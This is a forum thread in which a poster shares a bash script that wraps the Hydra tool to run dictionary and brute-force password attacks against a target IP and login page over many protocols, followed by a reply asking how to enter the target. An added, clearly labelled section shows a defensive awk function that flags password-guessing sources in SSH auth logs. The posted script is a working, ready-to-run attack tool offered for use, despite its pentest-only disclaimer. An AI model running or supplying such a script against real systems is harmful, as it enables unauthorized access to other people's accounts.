Thread: Hydra bruteforce and dictionary attack script.

  1. #1
    Member
    Join Date
    Jan 2010
    Posts
    54

    Hydra bruteforce and dictionary attack script.

    This is my first script - HidraShok

    It is a script to make password attacks a lot easier for people. It can do either bruteforcing or dictionary attacks.

    I spent all morning learning how to code this and I wanted to share it with everyone. I couldn't find a section in the forums for scripts, but I noticed there were a lot of scripts in this section, so I chose to post here (please move if it is the wrong section).

    version 0.1
    • It can do a dictionary attack
    • It can bruteforce
    • It can use a single username or a list of usernames
    • You can choose how many tasks to run simultaneously
    • You can choose the timeout time
    • You can choose the webpage to attack


    version 0.2
    • Fixed a problem in the if statement that executed the final command to run hydra. It was stopping the script from working if you had picked password option 1 or 2.
    • New issue: when choosing the option to use text files, the script turns the ' into / so it messes up the script. Looking for a fix, does anyone know one?




    Things I want to do
    • Add in error detection in case user enters wrong info
    • More options to define the attack
    Last edited by deviney; 06-17-2012 at 03:21 AM.

  2. #2
    Member
    Join Date
    Jan 2010
    Posts
    54

    Re: Hydra bruteforce and dictionary attack script.

    Let me know what you think and how it could be improved


    Code:
    #!/bin/bash
    # PLEASE READ AND STUDY BEFORE LAUNCHING
    
    # --------------------------------------------------------------------------------------------------------------------#
    # v0.2 17.06.2012
    #
    # Copyright (C) 2012  Deviney
    
    # This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public 
    # License as published by the Free Software Foundation; either version 2 of the License, or any later version.
    # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied 
    # warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
    # You should have received a copy of the GNU General Public License along with this program; if not, write to the
    # Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
    # --------------------------------------------------------------------------------------------------------------------#
    
    # Disclaimer:   This script is intended for use only for private study or during an authorised pentest. The author bears no responsibility for malicious or illegal use.
    #               I sincerely hope skiddies find it overwhelming. (not very likely tho)
    
    
    #  ===========================================================================================  #
    # 				  "...On The Shoulders Of Giants..."                                            #
    #  ===========================================================================================  #
    
    # 		Large chunks copied directly from VulpiArgenti's PwnSTAR script                            #
    #										                                                        #
    #		I only used parts that made the script look user friendly; the code
    #		that does the work is my own or has been edited to do a different job.
    
    #  ===========================================================================================  #
    
    # Thanks to VulpiArgenti, I used his code as a learning base
    
    
    
    # ~~~~~~~~~~  Environment Setup ~~~~~~~~~~ #
    # Text color variables - saves retyping these awful ANSI codes
    
    txtrst="\e[0m"      # Text reset
    
    def="\e[1;34m"	    # default 		   blue
    warn="\e[1;31m"     # warning		   red
    info="\e[1;34m" 	# info             blue
    q="\e[1;32m"		# questions        green
    inp="\e[1;36m"	    # input variables  cyan
    
    ### 7 characters = 120 pixels?
    var=$(ls /etc | grep kde4)          # detect KDE
    if [[ -z $var ]];then
        resize -s 38 85 &> /dev/null    # resize the terminal if gnome, not KDE
    fi
    
    echo -e "\e[0;40m"      # background black
    clear
    
    # ~~~~~~~~~~ Intro ~~~~~~~~~~ #
    
    banner_fn()
    {
    	echo -e "\e[1;37m 
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Deviney~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                              
                      
                                                                                                                      
        *                    **                                  *******      *                    *           
      **          *           **                               *       ***  **                   **            
      **         ***          **                              *         **  **                   **            
      **          *           **                              **        *   **                   **            
      **                      **   ***  ****                   ***          **           ****    **            
      **  ***   ***       *** **    **** **** *    ****       ** ***        **  ***     * ***  * **  ***       
      ** * ***   ***     *********   **   ****    * ***  *     *** ***      ** * ***   *   ****  ** * ***      
      ***   ***   **    **   ****    **          *   ****        *** ***    ***   *** **    **   ***   *       
      **     **   **    **    **     **         **    **           *** ***  **     ** **    **   **   *        
      **     **   **    **    **     **         **    **             ** *** **     ** **    **   **  *         
      **     **   **    **    **     **         **    **              ** ** **     ** **    **   ** **         
      **     **   **    **    **     **         **    **               * *  **     ** **    **   ******        
      **     **   **    **    **     ***        **    **     ***        *   **     **  ******    **  ***       
      **     **   *** *  *****        ***        ***** **   *  *********    **     **   ****     **   *** *    
       **    **    ***    ***                     ***   ** *     *****       **    **             **   ***     
           *                                             *                       *                           
          *                                               **                    *                            
         *                                                                     *                             
        *                                                                     *                             
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Hydro_Password_Hack_Script_V_0.2~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
    
    "
    }
    
    username_options_fn()
    {	
    sleep 2
    	# Trap Ctrl-C
    	trap exit_fn INT 
    	
        username_options=
        echo -e "$info Press ctrl-C at any time to exit neatly\n"
        sleep 1
    	echo -e "$q Are we using a single username or a username list? (list has to be a text file)"
        sleep 0.5
        echo -e "$def
    	
        1) A single username
    
    	
        2) A username list (text file)
    
        
        q) Exit from the script
    	
    	"
    
    read username_options
    	if [[ $username_options = q ]];then
    		exit_fn
        elif [[ $username_options = 1 ]];then
            sin_user_fn
        else
    	list_user_fn
        fi
        
    }
    
    sin_user_fn()
    {
    clear
    banner_fn
    usernamesign=
    : ${usernamesign:="-l "}
    echo -e "$q What is the username we will be using?"
    read username
    password_options_fn
    }
    
    list_user_fn()
    {
    clear
    banner_fn
    usernamesign= 
    : ${usernamesign:="-L "}
    echo -e "$q What is the path to your username list? (E.g. root/PasswordList.txt)"
    read username
    password_options_fn
    }
    
    password_options_fn()
    {
    clear
    banner_fn
        password_options=
    	echo -e "$q Are we using a single password or a password list? (list has to be a text file)"
        sleep 0.5
        echo -e "$def
    	
        1) A single password
    
    	
        2) A password list (text file)
    
    
        3) A Bruteforce attack
        
        q) Exit from the script
    	
    	"
        read password_options
        if [[ $password_options = q ]];then
    		exit_fn
        elif [[ $password_options = 1 ]];then
            sin_password_fn
        elif [[ $password_options = 2 ]];then
    	list_password_fn
        else
    	bruteforce_password_fn
        fi
        
    }
    
    sin_password_fn()
    {
    clear
    banner_fn
    passwordsign= 
    : ${passwordsign:="-p "}
    echo -e "$q What is the password we will be using?"
    read password
    Task_fn
    }
    
    list_password_fn()
    {
    clear
    banner_fn
    passwordsign= 
    : ${passwordsign:="-P "}
    echo -e "$q What is the path to your password list? (E.g. root/PasswordList.txt)"
    read password
    Task_fn
    }
    
    bruteforce_password_fn()
    {
    clear
    banner_fn
    brute_min=
    brute_max=
    brute_char= 
    : ${passwordsign:="-x"}
    : ${passwordsignbreak:=":"}
    echo -e "$q What is the min amount of characters in the password?"
    read brute_min
    echo -e "$q What is the max amount of characters in the password?"
    read brute_max
    echo -e "$q What characters will be bruteforced? (do not use any spaces, e.g. 'abcdefghi.@123')"
    read brute_char
    Task_fn
    }
    
    Task_fn()
    {
    clear
    banner_fn
    task=
    echo -e "$q How many parallel connections would you like? (suggest 1-32)"
    read task
    timeout_fn
    }
    
    timeout_fn()
    {
    clear
    banner_fn
    timeout=
    echo -e "$q How long would you like a connection to wait before being classed as timed out? (suggest 5-30)"
    read timeout
    ip_address_fn
    }
    
    ip_address_fn()
    {
    clear
    banner_fn
    ip=
    echo -e "$q What is the ip of the target?"
    read ip
    protcol_fn
    }
    
    protcol_fn()
    {
    clear
    banner_fn
    protcol=
    echo -e " $q What protocol will you be using? (Enter 'show' to see the protocols available)"
    read protcol
    if [[ $protcol = show ]];then
    show_protcols_fn
    else
    webpage_fn
    fi
    }
    
    show_protcols_fn()
    {
    clear
    banner_fn
    echo -e "AFP,			Cisco AAA,		 Cisco auth,	 	Cisco enable"
    echo -e "CVS,	 		Firebird,		 FTP, 			HTTP-FORM-GET"
    echo -e "HTTP-FORM-POST, 	HTTP-GET,		 HTTP-HEAD, 		HTTP-PROXY"
    echo -e "HTTPS-FORM-GET,	HTTPS-FORM-POST,	 HTTPS-GET, 		HTTPS-HEAD"
    echo -e "HTTP-Proxy, 		ICQ,     		 IMAP, 			IRC"
    echo -e "LDAP, 			MS-SQL,			 MYSQL, 		NCP"
    echo -e "NNTP, 			Oracle Listener,	 Oracle, 		Oracle SID"
    echo -e "PC-Anywhere, 		PCNFS,			 POP3, 			POSTGRES"
    echo -e "RDP, 			Rexec, 			 Rlogin, 		Rsh"
    echo -e "SAP/R3, 		SIP, 			 SMB, 			SMTP"
    echo -e "SMTP Enum, 		SNMP,			 SOCKS5, 		SSH (v1 and v2)"
    echo -e "Subversion, 		Teamspeak (TS2),	 Telnet, 		VMware-Auth"
    echo -e "VNC,			XMPP"
    echo -e ""
    echo -e "Press enter to return to the previous question"
    read
    protcol_fn
    }
    
    webpage_fn()
    {
    clear
    banner_fn
    webpage=
    echo -e "$q What is the webpage of the target login screen? (if there is no page after the IP address just enter a forward slash '/')"
    read webpage
    execute_fn
    }
    
    execute_fn()
    {
    clear
    banner_fn
     if [[ $password_options = [1-2] ]];then
    	echo -e "$warn hydra $usernamesign$username $passwordsign$password -e nsr -t $task -w $timeout -V $ip $protcol $webpage"
    	hydra $usernamesign$username $passwordsign$password -e nsr -t $task -w $timeout -V $ip $protcol $webpage
        elif [[ $password_options = 3 ]];then
            echo -e "$warn hydra $usernamesign$username $passwordsign $brute_min$passwordsignbreak$brute_max$passwordsignbreak$brute_char -e nsr -t $task -w $timeout -V $ip $protcol $webpage"
    	hydra $usernamesign$username $passwordsign $brute_min$passwordsignbreak$brute_max$passwordsignbreak$brute_char -e nsr -t $task -w $timeout -V $ip $protcol $webpage
    fi
    }
    
    exit_fn()
    {
    clear
    exit 0
    }
    
    # ~~~~~~~~~~ Main Script 2 lines!!! ~~~~~~~~~~ #
    
    banner_fn
    username_options_fn
    Last edited by deviney; 06-17-2012 at 02:32 AM.
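
Added example, not part of the thread or of the posted script: the script's username-list mode and its 1-32 parallel tasks show up on the target as a burst of failed logins from one source across several account names. The function below flags such sources in OpenSSH-style auth log lines; the sample lines are constructed, and the function names and thresholds are assumptions.

```shell
#!/bin/sh
# Added example: flag sources whose failed logins look like a password-guessing
# run. Log lines are constructed (OpenSSH syslog format, RFC 5737 addresses).
sample_log() {
cat <<'EOF'
Jun 17 03:21:01 host sshd[2101]: Failed password for root from 192.0.2.10 port 40001 ssh2
Jun 17 03:21:01 host sshd[2102]: Failed password for invalid user admin from 192.0.2.10 port 40002 ssh2
Jun 17 03:21:02 host sshd[2103]: Failed password for invalid user test from 192.0.2.10 port 40003 ssh2
Jun 17 03:21:02 host sshd[2104]: Failed password for root from 192.0.2.10 port 40004 ssh2
Jun 17 03:21:03 host sshd[2105]: Failed password for invalid user oracle from 192.0.2.10 port 40005 ssh2
Jun 17 03:25:10 host sshd[2110]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Jun 17 03:25:19 host sshd[2110]: Accepted password for alice from 198.51.100.7 port 51000 ssh2
Jun 17 03:30:00 host sshd[2120]: Failed password for bob from 203.0.113.5 port 52000 ssh2
Jun 17 03:30:05 host sshd[2120]: Failed password for bob from 203.0.113.5 port 52000 ssh2
Jun 17 03:30:09 host sshd[2120]: Failed password for bob from 203.0.113.5 port 52000 ssh2
EOF
}

# flag_sources MIN_FAILS MIN_USERS   (auth log on stdin)
# Prints "ip failures distinct_users" for each source at or above both thresholds.
flag_sources() {
    awk -v min_fails="$1" -v min_users="$2" '
    / sshd\[[0-9]+\]: Failed password for / {
        user = ""; ip = ""
        for (i = 1; i < NF; i++) {
            # First "for" starts the account name ("invalid user X" or "X").
            if ($i == "for" && user == "")
                user = ($(i+1) == "invalid" && $(i+2) == "user") ? $(i+3) : $(i+1)
            # Last "from" wins: the account name is remote-controlled text and
            # may itself contain the word "from".
            if ($i == "from") ip = $(i+1)
        }
        if (ip == "") next
        fails[ip]++
        if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
    }
    END {
        for (ip in fails)
            if (fails[ip] >= min_fails && users[ip] >= min_users)
                print ip, fails[ip], users[ip]
    }' | sort
}

# 5+ failures over 3+ account names from one address; prints: 192.0.2.10 5 4
sample_log | flag_sources 5 3
```

Requiring several distinct account names keeps a single user retyping a password (bob in the sample) out of the result unless the second threshold is lowered to 1.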

  3. #3
    Just burned his ISO
    Join Date
    Aug 2012
    Posts
    1

    Re: Hydra bruteforce and dictionary attack script.

    Possible update:

    {
    clear
    banner_fn
    webpage=
    echo -e "$q What is the webpage of the target login screen? (if there is no page after the IP address just enter a forward slash '/')"
    read webpage
    execute_fn
    }


    This is giving me the biggest headache in the world. Can you clarify with an example entry of what a user needs to write?

    For example is it: "FTP://172.16.3.165/"
